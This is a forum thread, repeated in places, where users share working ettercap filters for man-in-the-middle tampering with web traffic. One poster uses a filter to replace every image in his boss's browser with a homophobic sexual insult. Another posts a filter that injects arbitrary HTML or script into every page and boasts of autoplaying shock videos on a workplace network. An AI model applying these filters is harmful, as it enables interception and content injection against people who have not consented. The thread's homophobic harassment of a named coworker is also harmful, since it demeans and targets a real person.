He's probably busy contacting HR and filling out your termination papers.OK so I can see the zapp'n but I don't hear any screams from his office. Whats up?
ettercap filter - replace every img in victim brower
This ettercap filter should inject (replace) every img that the victim (boss) sees in his browser. Example every picture on cnn.com will be a PhotoShoped picture of my boss having queer sex in a gimp latex suit. I have compiled it like this:
etterfilter gimp.filter -o gimpsex.ef
and all looks good. The URL is not the real one here.
OK so I can see the zapp'n but I don't hear any screams from his office. Whats up?if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.*****.com/images/lars_is_gay.png\" ");
replace("IMG SRC=", "img src=\"http://www.******.com/images/lars_is_gay.png\" ");
msg("Filter Ran.\n");
}
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
He's probably busy contacting HR and filling out your termination papers.OK so I can see the zapp'n but I don't hear any screams from his office. Whats up?
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
lol, He has a sense of humor and likes to play "war games". Would have been worse if I had ettercap // //. There is nothing more or less wrong with the filter. Turns out that all the real pictures that were cached were being reloaded. He got me back by making a 15 sec splash screen from the movie " Deliverance " .... you know the squeal for me part.
The reason I said more or less was some img files that are not cached are sneaking by. Thought it was a browser thing. Turns out this is not the case. Any ideas ?
Let me explain officer, I am not a hacker. I am a security tester of sorts!
I have had alot of fun with ettercap and filters... i would put a video at the top of every page that will auto play...
go ahead and test that... your only limited by your own imagination at this point...Code:if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "<title>")) { replace("<title>", "</title> Put what you want here"); msg("script injected"); }}
I had a vary disturbing video auto play every time the user loads a page... im not going to post this source because i dont think these mods would like it... send me a pm and ill give you the source... or just play around with the source i provide...
Good stuff BigMac!Originally Posted by BigMac
Had the grand finale Tubgirl video scene "blast" my work network using // // right after lunchPolly works better then wpa2 to keep ppl off your home AP. Just leave it opn one night.
Thx for the code.
onryo.
Let me explain officer, I am not a hacker. I am a security tester of sorts!
If you want more examples check out the directory containing ettercap
It actually has example filter files there showing a wide variety of things
Posting Permissions